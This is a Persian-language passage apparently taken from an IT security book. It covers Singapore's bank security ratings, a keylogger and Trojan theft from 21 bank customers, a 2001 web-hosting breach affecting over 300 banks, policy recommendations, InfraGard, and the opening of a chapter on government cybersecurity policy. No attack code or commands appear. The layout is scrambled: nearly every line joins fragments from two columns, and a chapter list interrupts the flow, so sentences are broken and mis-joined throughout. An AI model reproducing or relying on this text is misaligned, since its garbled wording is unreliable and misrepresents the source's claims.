ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﺍﺕ ﻓﻨﺎﻭﺭﻱ ﻭ ﻳﻚ ﺳﻴـﺴﺘﻢ ﺑـﺮﺍﻱ ﺩﺭﺟـﻪﺑﻨـﺪﻱ ) (DBSﺻــﻮﺭﺕ ﮔﺮﻓــﺖ .ﺩﺭ ﺍﻳــﻦ ﺭﻭﻳــﺪﺍﺩ ﻧﻔــﻮﺫﮔﺮﺍﻥ ﺑــﺪﻟﻴﻞ
ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﺳﻴﺴﺘﻢ ﺍﻗﺘﺼﺎﺩﻱ ﺳﻨﮕﺎﭘﻮﺭ ﺍﺳﺖ؛ ﻛﻪ ﺑﺮ ﻣﺒﻨﺎﻱ ﺷـﺶ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻛﻲ ﺷـﺒﻜﻪ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﻧﺎﻣﻨﺎﺳـﺐ ﺳﻴـﺴﺘﻤﻬﺎ
ﻣﻌﻴﺎﺭ ﻛﻪ ﺗﻮﺳﻂ ﺍﺩﺍﺭﺓ ﺍﻣﻮﺭ ﭘﻮﻟﻲ ﺳـﻨﮕﺎﭘﻮﺭ ﺗﻌﻴـﻴﻦ ﺷـﺪﻩ ﺍﻧﺠـﺎﻡ ﺗﻮﺍﻧﺴﺘﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﺭﺍ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﻫﻨـﺪ .ﻧﻔـﻮﺫﮔﺮﺍﻥ
ﻣﻲﮔﻴﺮﺩ .ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ،ﻣﺆﺳﺴﺎﺕ ﺭﺍ ﺍﺯ ﻟﺤﺎﻅ ﻣﻴـﺰﺍﻥ ﺍﻳﻤﻨـﻲ ﺑـﻪ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍ ﻭ ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ﺭﺍ ﺩﺭ ﺣﺴﺎﺑﻬﺎﻱ ۲۱
ﭘﻨﺞ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺷـﻤﺎﺭﺓ ۱ﻧـﺸﺎﻧﮕﺮ ﺍﻣـﻦﺗـﺮﻳﻦ ﻭ ﻣﺸﺘﺮﻱ ﺑﺎﻧﻚ ﺗﻌﺒﻴﻪ ﻛﺮﺩﻧﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﺗـﺎ ﺷـﻤﺎﺭﺓ
ﺷﻤﺎﺭﺓ ۵ﻧﺸﺎﻧﮕﺮ ﻧﺎﺍﻣﻦﺗﺮﻳﻦ ﺁﻧﻬﺎ ﺍﺳﺖ .ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﻫﺴﺘﻨﺪ ﻛـﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ) (PINﻭ ﺷﻤﺎﺭﺓ ﺷﻨﺎﺳﺎﻳﻲ ﻛـﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺪﺳـﺖ
ﺩﺭ ﺍﻳﻦ ﺍﺭﺯﻳﺎﺑﻲ ﺣﺪﺍﻗﻞ ﺑﻪ ﺩﺭﺟﺔ ۲ﺩﺳﺖ ﻳﺎﺑﻨﺪ ،ﻭ ﻋﻼﻭﻩ ﺑـﺮ ﺁﻥ ﺁﻭﺭﻧــﺪ .ﺍﻳــﻦ ﺣﺎﺩﺛــﻪ ﺳــﺒﺐ ﺷــﺪ ۶۲,۰۰۰ﺩﻻﺭ ﺑــﻪ ﺣــﺴﺎﺑﻬﺎﻱ
ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻃﺮﺡ ﺑﺎﺯﻳﺎﺑﻲ ﻭ ﺗﺮﻣﻴﻢ ﺳﺮﻳﻊ ﻧﻴﺰ ﺩﺍﺷـﺘﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺿﺮﺭ ﻭﺍﺭﺩ ﺷﻮﺩ ،ﺍﻣﺎ ﻧﻜﺘﺔ ﻗﺎﺑـﻞ ﺗﻮﺟـﻪ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ
ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﭘﻴﺸﺮﻓﺖ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺑﺎﻧﻜﻬـﺎ ﻭ ﺍﻟﻘـﺎﻱ ﺗﺄﺛﻴﺮ ﻣﻨﻔﻲ ﺍﻳﻦ ﺭﺧﺪﺍﺩ ﺩﺭ ﺍﻓﻜﺎﺭ ﻋﻤﻮﻣﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺍﻳﻦ ﺑﻮﺩ؛
ﺣﺲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﺳﺎﺯﻱ ،ﻧﺘﺎﻳﺞ ﺍﻳﻦ ﺩﺭﺟﻪﺑﻨﺪﻱ ﺑـﺼﻮﺭﺕ ﻋﻤـﻮﻣﻲ ﭼﺮﺍﻛﻪ ﺭﻭﺯﻧﺎﻣﻪﻫﺎﻱ ﻛﺸﻮﺭ ﺑﻪ ﻣـﺪﺕ ﻳﻜﻤـﺎﻩ ﺩﺭ ﺍﻳـﻦ ﺧـﺼﻮﺹ
ﻣﻨﺘﺸﺮ ﻣﻲ ﺷﻮﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺑﺎﻧﻜﻬﺎ ﻣﻠﺰﻡ ﺑﻪ ﮔﺰﺍﺭﺵ ﻫﺮﮔﻮﻧـﻪ ﻣﻄﻠﺐ ﻧﻮﺷـﺘﻨﺪ .ﺍﻣﺜـﺎﻝ ﺍﻳـﻦ ﺭﺧـﺪﺍﺩﻫﺎ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺑﺤـﺮﺍﻥ
ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻲﺑﺎﺷﻨﺪ. ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﻣﺮﺩﻡ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﻣﻨﺠـﺮ
ﺑـــﺎ ﺍﻓـــﺰﺍﻳﺶ ﺍﺳـــﺘﻔﺎﺩﻩ ﺍﺯ ﺩﺳـــﺘﮕﺎﻫﻬﺎﻱ ﺳـــﻴﺎﺭ ﭘﺮﺩﺍﺧـــﺖ، ﺷﻮﻧﺪ.
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳـﻴﻢ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﺗﻮﺟـﻪ ﻗـﺮﺍﺭ ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺍﻳﻦ ﺭﺧﺪﺍﺩﻫﺎ ﺗﺄﺛﻴﺮ ﺩﺍﺷـﺖ
ﮔﻴﺮﻧﺪ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﺠﺮﺑﻴﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﺑﺎﻧﻜـﺪﺍﺭﻱ ﺑـﻲﺳـﻴﻢ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺗﻚﻋﺎﻣﻠﻲ ﺑﻮﺩ .ﻫﻢﺍﻛﻨﻮﻥ ﻧﻴﺰ ﺑﻴـﺸﺘﺮ
ﺳﻨﮕﺎﭘﻮﺭ ﻫﻤﭽﻨﺎﻥ ﺗﺤﺖ ﺑﺮﺭﺳﻲ ﻫﺴﺘﻨﺪ. ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺍﺯ ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺍﻭﻟﻴﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺗﻨﻬﺎ ﻳﻚ ﻳﺎ ﺩﻭ ﺣﺎﺩﺛﺔ ﺩﻫﺸﺘﻨﺎﻙ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺟﻤﻊﺑﻨﺪﻱ ﺳﺆﺍﻻﺕ ﻭ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ ﺑﺎﻧﻜﻬﺎ ﺭﺍ ﺑﻪ ﺗﺠﺪﻳﺪ ﻧﻈﺮ ﺩﺭ ﺍﻳﻦ ﺭﻭﻧﺪ ﻭﺍﺩﺍﺭ ﻛﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﻧﻮﻋﻲ
ﺗﻮﺻﻴﻪﻫﺎ ﻭ ﭘﺮﺳﺸﻬﺎﻱ ﭘﺎﻳﺎﻧﻲ ﺷﺎﻣﻞ ﻧﻘﺎﻁ ﻛﻠﻴﺪﻱ ﺍﻳـﻦ ﺳـﻤﻴﻨﺎﺭ ﺍﻋﺘﻤﺎﺩ ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺶ ﺍﺯ ﺣﺪ ﺑﻪ ﻓﻨﺎﻭﺭﻱ SSLﻭﺟﻮﺩ ﺩﺍﺭﺩ؛ ﺍﻣﺎ
ﺟﻬﺎﻧﻲ ﺑﻮﺩ. ﺍﻣﻨﻴﺘﻲ ﻛﻪ SSLﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﺑﺴﻴﺎﺭ ﻣﺤـﺪﻭﺩ ﺍﺳـﺖ ،ﭼﺮﺍﻛـﻪ
ﺗﻨﻬﺎ ﺩﺭ ﺧﻼﻝ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﺁﻧﻬﺎ ﺣﻔﺎﻇﺖ ﻣﻲﻛﻨﺪ ،ﻭ ﻧﻪ ﺩﺭ
ﻲ ﻧﻴﺎﺯﻫﺎﻱ ﺣـﺎﻝ
ﺍﻭﻝ ،ﺍﻃﻼﻉ ﺭﺳﺎﻧﻲ ﻭ ﺁﮔﺎﻫﻲ ﺩﺭ ﺁﻣﻮﺯﺵ ﻋﻤﻮﻣ ﹺ
ﻣﺒﺪﺃ ﻳﺎ ﻣﻘﺼﺪ .ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ﻭ ﺩﻳﮕﺮ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ
ﺣﺎﺿﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻘﺸﻲ ﺣﻴﺎﺗﻲ ﺍﻳﻔﺎ ﻣﻲﻛﻨـﺪ .ﻗـﻮﺍﻧﻴﻦ ﺩﻭﻟﺘـﻲ ﻣﺜـﻞ
ﺑﺎﻳﺪ ﻫﻤﻴﺸﻪ ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٢٢٨
ﺍﺳﺖ .ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻟﻲ ﺍﺯ ﻧﺤﻮﺓ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ "ﺍﻟﺰﺍﻡ ﮔﺰﺍﺭﺵ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺸﻜﻮﻙ" ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﻣﻔﻴﺪ ﻫﺴﺘﻨﺪ
ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ. ﻛﻪ ﺑﻪ ﻣﺮﺣﻠﺔ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ.
ﭼﻬﺎﺭﻡ ،ﺑﺮﺍﻱ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﻧﻮﻋﻲ ﺗﻌﻬﺪ ﺩﺭ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ، ﺩﻭﻡ ،ﺷﻔﺎﻓﻴﺖ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋﺎﺕ ﺭﺧﺪﺍﺩﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘـﺎﻱ ﺳـﻄﺢ
ﻧﻘــﺸﻬﺎ ﻭ ﻣــﺴﺌﻮﻟﻴﺘﻬﺎ ﺑﺎﻳــﺪ ﺗﻌﻴــﻴﻦ ﺷــﻮﻧﺪ؛ ﻭ ﻟــﺬﺍ ﺗــﺪﻭﻳﻦ ﻳــﻚ ﺍﻳﻤﻨﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﻳﻨﺪﻩ ﺍﻫﻤﻴـﺖ ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ .ﺑـﻪ ﺍﻳـﻦ ﻧﻜﺘـﻪ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺮﺍﻗﺒﺖ ﻭ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﺍﻣﺎﻧﺘﺪﺍﺭﻱ ﺑﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺷﺎﺭﻩ ﺷﺪ ﻛﻪ ﮔﺎﻫﻲ ﭘﻮﺷﺶ ﺧﺒﺮﻱ ﻭﻗﺎﻳﻊ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻀﺮ ﺑﺎﺷـﺪ،
ﺍﻗﺘﺼﺎﺩ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﻜﻲ ﺍﺯ ﻣﺴﺎﺋﻞ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺍﺳـﺖ .ﻋﻨـﺎﻭﻳﻦ ﭼﺮﺍﻛﻪ ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﻫﺮﺻﻮﺭﺕ ﺍﺯ ﻣﻄﺒﻮﻋﺎﺕ ﺗـﺄﺛﻴﺮ ﻣـﻲﭘﺬﻳﺮﻧـﺪ.
ﻣﺒﺎﺣﺚ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ﺳﭙﺮﺩﻩﻫـﺎ ﻭ ﺗﺮﺍﻛﻨـﺸﻬﺎ ،ﺍﻋﺘﻤـﺎﺩ ﺩﺭﻋــﻮﺽ ﺷــﺮﻛﺘﻬﺎ ﺑﺎﻳــﺪ ﻭﺿــﻌﻴﺖ ﺭﺍ ﺑــﺴﺮﻋﺖ ﺍﺻــﻼﺡ ﻛﻨﻨــﺪ.
ﻋﻤﻮﻣﻲ ،ﻭ ﺍﻃﻤﻴﻨﺎﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ. ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺸﻜﻞ ﺑﺎ ﺍﻳﺠﺎﺩ ﻳﻚ ﻃـﺮﺡ ﻋﻤﻠﻴـﺎﺗﻲ ،ﺭﺍﻩ ﺑﻬﺘـﺮﻱ
ﺳﺮﺍﻧﺠﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﻜﻲ ﺍﺯ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻳﻚ ﻧﻔﻮﺫ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ .ﺳﺆﺍﻝ ﻋﻤـﺪﻩﺍﻱ ﻛـﻪ ﺩﺭ
ﻣﻬﻢ ﺷﺮﻛﺖﻛﻨﻨﺪﮔﺎﻥ ﺑﻮﺩ .ﻧﻤﻮﻧﻪﺍﻱ ﺍﺯ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳﻦ ﺍﻳﻨﺠﺎ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﭼﻪ ﺣﺪﻱ ﻭ ﺩﺭ ﭼﻪ ﺯﻣـﺎﻧﻲ
ﺯﻣﻴﻨﻪ ﺩﺭ ﺳﺎﻝ ۲۰۰۱ﺭﺥ ﺩﺍﺩ؛ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﺷـﺮﻛﺖ ﺧـﺪﻣﺎﺕ ﺑﺎﻳﺪ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﻣﻨﺘﺸﺮ ﻛﺮﺩ .ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﻛﺘﺎﺏ
ﻣﻴﺰﺑــﺎﻧﻲ ﻭﺏ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﻣــﻮﺭﺩ ﻧﻔــﻮﺫ ﻗــﺮﺍﺭ ﮔﺮﻓــﺖ ﻭ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺭﻧﺘﻴﺠﻪ ﺍﻣﻨﻴﺖ ﺑﻴﺶ ﺍﺯ ۳۰۰ﺑﺎﻧـﻚ ﺧﺪﺷـﻪﺩﺍﺭ ﺷـﺪ .ﺟﺰﺋﻴـﺎﺕ ﺳﻮﻡ ،ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎﻱ ﺷـﺮﻛﺖﻛﻨﻨـﺪﻩ ﺑـﻪ ﻟـﺰﻭﻡ ﻫﻤﻜﺎﺭﻳﻬـﺎﻱ
ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﺧﺎﺭﺝ ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻓﺮﺍﺑﺨﺸﻲ ﺗﺄﻛﻴﺪ ﺩﺍﺷﺘﻨﺪ .ﻳﻜﻲ ﺍﺯ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﻫﻤﻜﺎﺭﻱ ﺩﺭ ﺁﻥ
ﺑﺨﺸﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﻭ ﺳـﺎﻳﺮ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﺩﺭ ﻗـﺴﻤﺖ ﻣﺜﻤﺮ ﺛﻤﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻫـﺴﺘﻨﺪ .ﺩﺭ
ﺿﻤﺎﺋﻢ ﺑﻪ ﺁﻧﻬﺎ ﺍﺷﺎﺭﻩ ﺷﺪﻩ ﭘﻴﺪﺍ ﻛﺮﺩ. ﺍﻳﻦ ﻗﺴﻤﺖ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺎ ﺟﺎﻣﻌﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨـﺪ
ﺗﺎ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻫﺮ ﺑﺨﺶ ﻣﺸﺨﺺ ﺷـﻮﺩ ،EBG .ﻳﻜـﻲ ﺍﺯ
ﺩﺭ ﺧﺎﺗﻤــﻪ ﺧﺎﻃﺮﻧــﺸﺎﻥ ﻣــﻲﻛﻨــﻴﻢ ﻛــﻪ ﺑــﺮﺍﻱ ﻗﺎﻧﻮﻧﮕــﺬﺍﺭﺍﻥ ﻭ
ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﻭ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﻭ ﻧﻴﺰ InfraGardﻛﻪ ﻳﻚ
ﺑﺎﺯﺭﺳﺎﻥ ،ﺍﺭﺯﻳﺎﺑﻲ ﻣﺠﺪﺩ ﭼﺘﺮ ﺗﻘﻨﻴﻨﻲ )ﺧﺼﻮﺻﹰﺎ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﭘـﻮﻝ
ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ -ﻋﻤﻮﻣﻲ ﻣﺘﻌﻠﻖ ﺑـﻪ FBIﺍﺳـﺖ ﺩﻭ ﻧﻤﻮﻧـﻪ ﺍﺯ
ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺛﺎﻟﺚ ،ﻣﺜﻞ ﺷﺮﻛﺘﻬﺎﻱ ﻣﻴﺰﺑﺎﻧﻲ ﻭﺏ( ﺍﻣﺮﻱ ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ
ﺍﻳﻦ ﻗﺒﻴﻞ ﻣﺆﺳﺴﺎﺕ ﻫﺴﺘﻨﺪ InfraGard .ﺗﻤﺎﻣﻲ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ
ﺍﺳﺖ.
ﺣﻴﺎﺗﻲ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ ﻭ ﺣﺪﻭﺩ ۱۰,۰۰۰ﻋﻀﻮ ﺩﺍﺭﺩ .ﻫﺪﻑ ﺍﻳﻦ
ﺳﺎﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﺍﻋﺘﻤﺎﺩ ﻭ ﺗﺸﻮﻳﻖ ﺍﺷﺘﺮﺍﻙ ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺍﻋـﻀﺎ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻭﻟﱵ
ﻓﺼﻞ .۳ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﱵ ﺑﺮ ﲞﺶ ﺧﺼﻮﺻﻲ
ﻓﺼﻞ .۴ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺖ ﺳﺎﻳﱪ ﺩﻭﻟﺖ
ﺩﺍﺭﻧﺪ ٤.ﺑﻨﺎﺑﺮﺍﻳﻦ ﻗﺴﻤﺖ ﺍﻋﻈـﻢ ﻣـﺴﺌﻮﻟﻴﺖ ﻛـﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ
ﺍﻣﻨﻴﺖ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺍﺳﺖ .ﻋﻠﻴﺮﻏﻢ
ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﻭﺟﻮﺩ ﻭ ﻛﺎﺭﺍﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺑـﺮﺍﻱ ﺭﻓـﺎﻩ
ﻻ ﻛﺎﺭﺑﺮﺩ ﺁﻧﻬﺎ ﺩﺭ ﻣﻮﺍﻗﻌﻲ ﺍﺳﺖ ﻛـﻪ ﻣﻠﻲ ﺿﺮﻭﺭﻱ ﺍﺳﺖ ﻭ ﻣﻌﻤﻮ ﹰ
ﺍﺯ ﺁﻥ ﺍﺳﺘﻘﺒﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻣﻲﺷﻮﺩ ﻭ ﻟﺬﺍ ﺩﻭﻟﺖ ﺑﻪ ﺁﻥ ﺗﻮﺟﻪ ﺯﻳﺎﺩﻱ ﻓﺼﻞ ﺍﻭﻝ
ﻻ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﺎﺹ ﺧـﻮﺩ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺩﻭﻟﺘﻬﺎ ﻣﻌﻤﻮ ﹰ
ﺩﺍﺭﻧﺪ؛ ﺍﺯ ﺟﻤﻠﻪ ﺭﺍﻳﺎﻧﻪﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﻣﻨﻴـﺖ ﻣﻠـﻲ ،ﺧـﺪﻣﺎﺕ
ﻣﻘﺪﻣﻪ
ﺍﺿــﻄﺮﺍﺭﻱ ،ﺑﻬﺪﺍﺷــﺖ ﻭ ﺳــﺎﻳﺮ ﻋﻤﻠﻜﺮﺩﻫــﺎﻱ ﺿــﺮﻭﺭﻱ ﻣــﻮﺭﺩ ﻣﺸﺎﺑﻪ ﺳﺎﻳﺮ ﺯﻣﻴﻨﻪﻫﺎﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺮ ﺍﻳﻨﺘﺮﻧﺖ ،ﺩﺭ ﻣﻘﻮﻟـﻪ ﺍﻣﻨﻴـﺖ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﻏﺎﻟﺒﹰﺎ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﺭﺗﺒﺎﻃﻲ ﺧﺼﻮﺻﻲ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻴـﺰ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺍﻳﻔـﺎ
ﻭﺍﺑــﺴﺘﻪﺍﻧــﺪ .ﺩﺭ ﻣﺠﻤــﻮﻉ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣﻲﻛﻨﺪ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺑﺎﻳﺪ ﺑﺎ ﺍﺣﺘﻴﺎﻁ ﺍﻇﻬﺎﺭ ﻧﻈﺮ ﻛـﺮﺩ،
ﺷﺮﻛﺘﻬﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﻭﺍﺑـﺴﺘﻪ ﺑـﻪ ﻫﻤـﺎﻥ ﭼﺮﺍﻛﻪ ﻳﻚ ﭼـﺎﺭﭼﻮﺏ ﻋﻤـﻮﻣﻲ ﺳﻴﺎﺳـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻭ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﺷـﺮﻛﺘﻬﺎﻱ ﺗﻘﻮﻳﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺍﺷﻜﺎﻻﺗﻲ ﻛﻪ ﺩﺭ ﺍﺛﺮ ﻣﻘﺮﺭﺍﺕ ﻧﺎﺩﺭﺳـﺖ ﺩﻭﻟﺘـﻲ
